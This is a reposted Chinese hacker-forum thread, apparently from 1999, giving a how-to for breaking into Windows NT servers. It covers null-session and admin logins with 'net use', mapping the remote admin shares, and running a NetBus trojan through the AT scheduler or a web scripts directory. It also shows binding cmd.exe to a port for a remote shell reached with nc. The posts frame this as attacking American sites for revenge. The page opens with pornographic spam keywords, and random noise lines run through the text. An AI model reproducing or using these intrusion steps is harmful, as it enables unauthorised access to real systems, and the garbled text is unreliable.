久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖
汶上信息港
標(biāo)題:
關(guān)于“怎樣進(jìn)入NT主機(jī)”的幾點(diǎn)補(bǔ)充
[打印本頁]
作者:
雜七雜八
時(shí)間:
2011-1-13 17:03
標(biāo)題:
關(guān)于“怎樣進(jìn)入NT主機(jī)”的幾點(diǎn)補(bǔ)充
《版主頁黑客工具和文章的幾個(gè)問題》中提到:
0 }7 y" M( H3 d& c$ y* n6 L
請教,從版主頁上載得PINGER,GRINDER,LETMEIN等,卻不能用,PINGER安裝后,明明安裝前文件有1M多,但安裝完后生成的文件夾中只有PINGER。EXE,40多K,運(yùn)行PINGER,設(shè)置好IP,點(diǎn)PING,彈出一個(gè)窗口(C++。。。),說出錯(cuò),然后關(guān)閉了,何故,是不是安裝有誤? 2。運(yùn)行LETMEIN,彈出以下錯(cuò)誤:連接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否說明需要NETAPI32。DLL文件,哪里有該DLL。 3。USAKILLER 的教學(xué)文章中提到需在WINNT4。0下運(yùn)行以下步驟等,是否要求我的操作系統(tǒng)也是WINNT4。0 ,應(yīng)該不是吧? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問題需高手回答,我花那么多的時(shí)間和金錢下載這幾M文件卻不能用,實(shí)在窩囊哦, 強(qiáng)烈建議USAKILLER 等高手級的黑客寫更多的教學(xué)文章,以提高我國黑客水平。
9 i5 _: Q, b; k1 R
> 我的機(jī)子MMX166,WIN98,2。5G,32M內(nèi)存。
! r" p" l) _1 _6 x( Y. z
* Y4 V% F; O( `! V& `4 S
黑客并不神秘,你只要了解操作系統(tǒng),學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn),輔助相關(guān)的工具,就可以成功。
' O' }% D" ?0 w; W2 I6 g$ {
你的問題是,pinger, grinder, letmein等工具必須要在NT上運(yùn)行,我們強(qiáng)烈建議,你一定要安裝NT,對于你的機(jī)器配制,和我們現(xiàn)在差不多,只是比你多了32M內(nèi)存,2G硬盤。
; Z& Z! j) U: \! N4 o: o. [
其實(shí),攻擊敵站,利用其操作系統(tǒng)本身的工具就可以了,比如,我們在NT上攻擊某服務(wù)器,該服務(wù)器為NT4.0,我們將做如下簡單事情就有可能成功,假設(shè)目標(biāo)NT的IP地址為111.111.111.111,做法如下:
$ H! y: y8 q( i2 a$ ~9 a- v
net use \\111.111.111.111\ipc$ "" /user:""
+ A8 v; R. ^' R c
net.exe是NT的工具文件,該命令將和目標(biāo)服務(wù)器建立Null Session,如果成功,你可以查看該服務(wù)器上的共享目錄:
/ O7 S+ }. M T: a1 y. y0 \
net view \\111.111.111.111
; V. j C7 h/ f: g
當(dāng)然,如果你有該NT管理員密碼,就更好辦了,假設(shè)其管理員Admin密碼為fuck:
" ^- O" v6 M$ x5 m1 o7 v) l
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
2 | g6 _. X; h% o. h
命令成功后,幾乎所有目標(biāo)NT上的配制,資源,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來查看或修改:
$ i% H( h' a* \, w8 r. |, N( D2 M
1、查看或修改遠(yuǎn)程機(jī)器上的硬盤,假如目標(biāo)NT上有C、D兩個(gè)硬盤:
$ W- k$ \+ y% L3 J. g
net use x: \\111.111.111.111\c$
$ R7 k& d) a! l/ n
net use y: \\111.111.111.111\d$
; _% P- M* _2 x" O
這樣,目標(biāo)NT上的C、D盤分別被影射為你本地的X、Y盤,你想怎么做都可以...
" s/ @, {. |) |/ K' Q5 b- A! b
2、管理目標(biāo)NT的用戶:
0 z$ P8 p2 r0 L' {6 p$ q
從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
$ M& d4 a. l+ i' n' t0 J) A' g% G
鍵入\\111.111.111.111后,目標(biāo)NT上的所有用戶你想怎么做都可以,和管理你本地的一樣
7 H5 w/ f2 {! t
3、管理目標(biāo)NT的服務(wù)
4 Q! _1 n% s+ E
選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”
. o7 K, T, r3 K! ]/ @. U$ x
這樣你可以管理目標(biāo)NT上的服務(wù),共享目錄
# R7 q5 \1 D: V$ _& D
4、IIS管理
2 C$ i0 ~5 b) E# T8 w) @) ?; f
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
$ p: \7 h# N, [4 j/ o
目標(biāo)NT的FTP、WWW服務(wù)你就可以重新配置
8 F9 _1 d+ k! u- ]9 V2 m
5、事件管理
0 ]+ Z6 Y! \- a2 t3 d, Z5 R
“事件查看器”->連接到服務(wù)器->111.111.111.111
) J, Q7 E) f6 |1 s3 `3 t& G% U/ a
8 N, r6 i* Z% q
還有更多的東西,都可以用NT本身的功能來完成,這些都是95, 98所不能實(shí)現(xiàn)的。
* E+ O6 ^: F. Q2 d
" d& r& c/ Z/ o" c6 a- m
當(dāng)然,98,95也能做一些事情,但很麻煩,比如:
6 N+ N: M+ q* ]) S
net use \\111.111.111.111\ipc$
1 `* B# J( v( [' r9 q* z
net use z: \\111.111.111.111\d$
- |! I, v3 r, c+ v- i+ q
但其后不能帶參數(shù),即改用其他用戶或密碼,系統(tǒng)將用當(dāng)前用戶和密碼去登錄,如果你知道目標(biāo)NT的用戶或密碼,重新啟動95, 98,改用該用戶和密碼登錄,方可實(shí)現(xiàn),你可以連接目標(biāo)NT上的共享資源,但不能進(jìn)行管理,如用戶、事件等
* ^5 L) `4 s' b9 t# m6 h1 N
/ L2 Y9 f5 Q; L( K3 y& \4 }
我們強(qiáng)烈建議各位有心要為死難者報(bào)仇,真正的想黑霉國的站點(diǎn),花點(diǎn)時(shí)間,裝個(gè)NT吧,NT Workstation也可以!
+ l a8 l4 H$ l; S
這樣,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用!
( K1 d3 c2 p" r6 B+ M
3 a! Q6 Q6 s. Z2 C& {9 k" Q
9 T* {- @9 ]" M$ J" S" q0 X
--------------------------------------------------------------------------------
' Q/ I9 @5 E( M, Z# a2 Y2 t: f0 _
, }- p$ p) F+ ?% \# [% A3 A" y$ F1 |
>quack于1999-06-12,23:37:44
: ^0 E U% A! Q1 i
在大作《幾個(gè)有關(guān)黑的問題》中提到:
; Y2 A8 v. \$ q& h: I+ p
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時(shí)亦無此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時(shí)無效,假定上傳其它"有益"美國NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個(gè)美國人,哈!。
4 {: l% V# M$ x
7 i8 [ W: i* b: J8 ?# A j
killusa于1999-06-13,03:25:15
" c* E5 V/ V/ R5 @5 _
在大作《Re: 幾個(gè)有關(guān)黑的問題》中提到:
/ [2 T+ o2 s& Q _9 c& c- N
6 Z0 z1 m$ J5 ~& ^
letmein.exe 暫時(shí)沒有mypwd參數(shù),十分抱歉
{( R' ?# \; v, N d
pinger程序,只是利用ping來尋找主機(jī),每臺NT服務(wù)器有一個(gè)主IP地址,但也可以設(shè)置多個(gè)輔助IP地址,比如有些服務(wù)器供應(yīng)商,一臺NT服務(wù)器上可以設(shè)置一千多個(gè)IP,每個(gè)IP對應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址,就是該主機(jī)的主IP地址,所以有時(shí)顯示只有IP,而無主機(jī)名。另外,有些服務(wù)器是非NT的操作系統(tǒng),有時(shí)將不會顯示主機(jī)名。當(dāng)然,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置,也會出現(xiàn)上面的情況。
0 m/ j) H! E& ~7 R
# ` j. ~# \/ u" m* `
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序,所以,netbus.exe是不用上傳的,只需在目的
) Z0 V1 C* E9 g# n0 y" w
服務(wù)器上運(yùn)行ntsrv.exe,而在目的服務(wù)器運(yùn)行該程序有很多種方法:
|; h7 R1 \; X4 X1 I3 f2 k
3 d2 b+ x4 i. N: N l% w) z( m
1、利用服務(wù)器的 Schedule 服務(wù)來啟動schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序,具體使用方法,可在自己的NT Dos窗口下鍵入以下:
6 p6 |( C5 L, L, }
$ V6 R, J" M, z6 i
C:\>net start schedule
$ _' F! ~0 z& ^8 k7 G1 G; F
Schedule 正在啟動服務(wù).....
# [% t3 R( g& q( ]
Schedulw 服務(wù)啟動成功。
, `9 T: S7 Z, V" K4 k3 O4 h
C:\>at /?
" k$ N S4 G. _6 `
AT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序。
( R' g/ B3 e' h4 K
運(yùn)行 AT 命令之前必須先啟動 Schedule 服務(wù)。
+ p/ F0 R8 B0 x3 Q$ m6 f
2 _& z& D9 }# V2 n
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
7 x/ d( J5 m$ I, T7 k
AT [\\computername] time [/INTERACTIVE]
, Z+ _0 `6 ^" R. E
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
3 T- l/ z( O( ^- j- E
# g# F% ~0 h5 u# k
\\computername 指定遠(yuǎn)程計(jì)算機(jī)。 如果省略這個(gè)參數(shù)
; s l" P+ \: [' a9 X
命令會被排定在本機(jī)上運(yùn)行。
$ Y7 h% D% n1 @7 ^3 j. [# ^
id 指定給排定進(jìn)度命令的識別號。
* a6 R- q) i6 s U" l$ _9 W
/ b$ s3 W- D0 q* W9 j" p0 @
/delete 刪除某個(gè)已排定進(jìn)度的命令。如果省略標(biāo)識,計(jì)算機(jī)上所有已排定進(jìn)度的命令都會被刪除。
+ y2 P) T3 k4 t% v8 Y
/yes 用于刪除所有作業(yè),且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 。
& k5 ^. m b) L5 j b
time 指定命令運(yùn)行的時(shí)間。
1 W e, _. F# ^* Z
/interactive 允許作業(yè)在運(yùn)行時(shí),與用戶通過桌面交互。
) K1 j$ A4 q# b" q0 S Q7 g
" B! U% n7 I. @# R9 V
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令。
8 Z3 x' y6 z5 q. c [$ l
如果省略日期,則默認(rèn)為在每月的本日運(yùn)行。
; D) [3 o* n' O
0 A- a- A1 B7 W' G/ [) Z( r
/next:date[,...] 指定在下一個(gè)指定日期 (如,下周三),運(yùn)行命令。如果省略日期,則默認(rèn)為在每月的本日運(yùn)行。
8 P* ?! Y, G5 K4 S6 H8 [+ C
5 ]+ m1 R6 [' G
"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件。
$ R; o7 R( N( w
; t+ {, q0 \- M0 T5 s7 { @
C:\>
$ X7 Q8 V7 l% p+ [' U
1 T- M; o7 Q7 [5 L1 Y" ?
知道了如何使用AT,再來看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:
% B; C N8 y7 G& |( ~
1 利用管理員登陸到目的服務(wù)器,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
# r( L8 j" ]) s( `8 y, Y' G, h+ p1 U
2 利用ntsrv.exe啟動遠(yuǎn)程: netsvc \\x.x.x.x schedule /start
/ D9 y. {9 n1 g, G/ `
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行,當(dāng)然最快運(yùn)行最理想,所以,你可以用letmein.exe得到服務(wù)器的時(shí)間,然后:
' s- Y2 N8 `, o. |3 ~) s1 F: c* _
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
- q3 @+ s0 }. o0 B
其中00:00要改為用letmein.exe得回來的具體時(shí)間+一點(diǎn)容量,等一會后,再在本地啟動netbus.exe,鍵入目的服務(wù)器得ip地址或hostname,連接!具體使用可參照 "How to get in nt",比如第一種方法,你想要在目的服務(wù)器運(yùn)行 LEGION,可以利用netbus得上傳功能,將LEGION上傳至目的服務(wù)器,再用netbus的"Start program",鍵入完整路徑的LEGION運(yùn)行程序,就ok了!第二種方法是利用netbus的“App redirect”功能,啟動遠(yuǎn)程telnet服務(wù),如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe",Port為:4321,服務(wù)就啟動了,然后在本地運(yùn)行:nc x.x.x.x 4321,出現(xiàn)dos啟動的畫面就表示連接成功:
& ]( Y" u3 p8 w: Y2 j' A( {6 g1 Q
Microsoft(R) Windows NT(TM)
1 C* u9 b0 \ y2 I5 b, v- t5 e
(C) Copyright 1985-1996 Microsoft Corp.
) b1 ?9 Y/ q8 V" j5 \: Q d+ `
C:\>
% I7 {1 F3 j4 }
|$ W# G( W. t! C+ B% A: _
2、利用web啟動ntsrv.exe或其他程序在目的服務(wù)器
8 q8 f4 k2 n$ i! d7 l9 {' F" V& i
+ `! _+ S. L4 [* t! z+ g! D
將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄,如cgi-bin或scripts,然后在瀏覽器鍵入url如:
3 S5 ^# x, ^' U* `; @
http://x.x.x.x/scripts/ntsrv.exe
/port:64321
7 A R, h9 k' L+ R
或
http://x.x.x.x/cgi-gin/ntsrv.exe
/port:64321
# u3 E- t! ]/ g& |* z! f( y
該程序就啟動了
* s+ W( v0 l( S) ~/ `+ S) Q% y( H
" u/ O& A h0 ]1 R
我只提這幾中方法!
* R& \: V+ R- t* q
要成功,必須打好基礎(chǔ)工,對操作系統(tǒng)充分了解!
8 D2 y# D- d: Y0 J N
b5 ^9 E9 p) s( l2 ?. p7 D
歡迎光臨 汶上信息港 (http://m.junkejituan.com/)
Powered by Discuz! X3.5